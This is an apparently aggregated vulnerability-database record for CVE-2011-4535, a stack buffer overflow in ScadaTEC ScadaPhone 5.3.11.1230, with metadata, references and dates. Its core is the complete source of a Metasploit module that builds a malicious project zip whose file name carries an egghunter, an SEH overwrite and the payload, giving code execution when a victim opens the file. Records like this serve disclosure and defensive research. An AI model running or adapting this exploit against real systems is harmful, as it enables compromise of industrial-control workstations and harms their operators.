ID

VAR-E-201109-0096


CVE

cve_id:CVE-2011-4535

Trust: 1.9

sources: BID: 49560 // EXPLOIT-DB: 17833 // EDBNET: 40355

EDB ID

17833


TITLE

ScadaTEC ScadaPhone 5.3.11.1230 - Local Stack Buffer Overflow (Metasploit) - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17833

DESCRIPTION

ScadaTEC ScadaPhone 5.3.11.1230 - Local Stack Buffer Overflow (Metasploit). CVE-75375CVE-2011-4535 . local exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17833

AFFECTED PRODUCTS

vendor:scadatecmodel:scadaphonescope:eqversion:5.3.11.1230

Trust: 1.3

vendor:scadatecmodel:scadaphonescope:lteversion:<=5.3.11.1230

Trust: 0.6

vendor:scadatecmodel:modbustagserverscope:eqversion:4.1.1.81

Trust: 0.3

sources: BID: 49560 // EXPLOIT-DB: 17833 // EDBNET: 40355

EXPLOIT

##
# $Id: scadaphone_zip.rb 13728 2011-09-13 20:10:28Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 5.3.11.1230 of scadaTEC's ScadaPhone.

In order for the command to be executed, an attacker must convince someone to
load a specially crafted project zip file with ScadaPhone.
By doing so, an attacker can execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # found + msf
],
'Version' => '$Revision: 13728 $',
'References' =>
[
#[ 'CVE', '' ],
[ 'OSVDB', '75375' ],
[ 'URL', 'http://www.scadatec.com/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17817/' ],
],
'Platform' => [ 'win' ],
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
},
'Targets' =>
[
# POP ESI; POP EBX; RETN [ScadaPhone.exe]
[ 'Windows Universal', { 'Ret' => 0x004014F4 } ],
],
'DisclosureDate' => 'Sep 12 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
], self.class)

end

def exploit

eggoptions =
{
:checksum => false,
:eggtag => 'zipz'
}

hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

fname = rand_text_alpha_upper(229)
fname << hunter
fname << rand_text_alpha_upper(48-hunter.length)
fname << Rex::Arch::X86.jmp_short(-50)
fname << rand_text_alpha_upper(2)
fname << [target.ret].pack('V')
fname << rand_text_alpha_upper(100)
fname << egg
fname << rand_text_alpha_upper(4096-fname.length)
fname << [0x7478741e].pack('V')

zip = Rex::Zip::Archive.new
xtra = [0xdac0ffee].pack('V')
comment = [0xbadc0ded].pack('V')
zip.add_file(fname, xtra, comment)

# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")

file_create(zip.pack)
end

end

Trust: 1.0

sources: EXPLOIT-DB: 17833

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 17833

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17833

TYPE

Local Stack Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 17833

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

sources: EXPLOIT-DB: 17833

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 17833

EXTERNAL IDS

db:NVDid:CVE-2011-4535

Trust: 1.9

db:EXPLOIT-DBid:17833

Trust: 1.6

db:EDBNETid:40355

Trust: 0.6

db:ICS CERTid:ICSA-11-362-01

Trust: 0.3

db:ICS CERT ALERTid:ICS-ALERT-11-255-01

Trust: 0.3

db:BIDid:49560

Trust: 0.3

sources: BID: 49560 // EXPLOIT-DB: 17833 // EDBNET: 40355

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-4535

Trust: 1.6

url:https://www.exploit-db.com/exploits/17833/

Trust: 0.6

url:http://www.us-cert.gov/control_systems/pdf/ics-alert-11-255-01.pdf

Trust: 0.3

url:http://www.us-cert.gov/control_systems/pdf/icsa-11-362-01.pdf

Trust: 0.3

url:http://www.scadatec.com/

Trust: 0.3

sources: BID: 49560 // EXPLOIT-DB: 17833 // EDBNET: 40355

SOURCES

db:BIDid:49560
db:EXPLOIT-DBid:17833
db:EDBNETid:40355

LAST UPDATE DATE

2022-07-27T09:16:12.797000+00:00


SOURCES UPDATE DATE

db:BIDid:49560date:2012-01-03T19:10:00

SOURCES RELEASE DATE

db:BIDid:49560date:2011-09-09T00:00:00
db:EXPLOIT-DBid:17833date:2011-09-13T00:00:00
db:EDBNETid:40355date:2011-09-13T00:00:00